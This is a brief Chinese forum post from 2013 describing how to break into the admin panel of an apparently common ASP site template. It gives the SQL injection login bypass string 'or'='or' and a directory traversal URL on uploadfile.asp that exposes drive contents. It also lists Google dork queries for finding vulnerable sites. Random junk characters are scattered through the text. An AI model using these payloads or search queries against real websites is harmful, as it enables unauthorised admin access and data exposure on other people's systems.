后台万能密码 'or'='or'
+ ~4 R$ u, N( {$ h" M9 q( T
, R( U ~7 Z$ L9 S! p$ r3 e, Q" D5 D后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 P, E7 v3 O& n7 |, uadmin/uploadfile.asp?currentFolder=/upfiles/../
; b$ P* ^+ o1 ~2 b# |
% O# u' Y3 N9 L4 b* D2 }$ ]漏洞证明:$ P, P3 P) A0 O* h& J& I* e
& w4 [/ S4 A& S0 ^2 p
谷歌:inurl:type.asp?id=1 新闻中心
" d9 n0 Z! Q- w* i T& d/ `或者 :inurl:download_ok.asp?
+ l5 c% c; v( ~# I3 J( R9 l
& z; X2 A2 F$ H$ x' w |
发表于 2013-3-14 20:17:32
收藏
支持
反对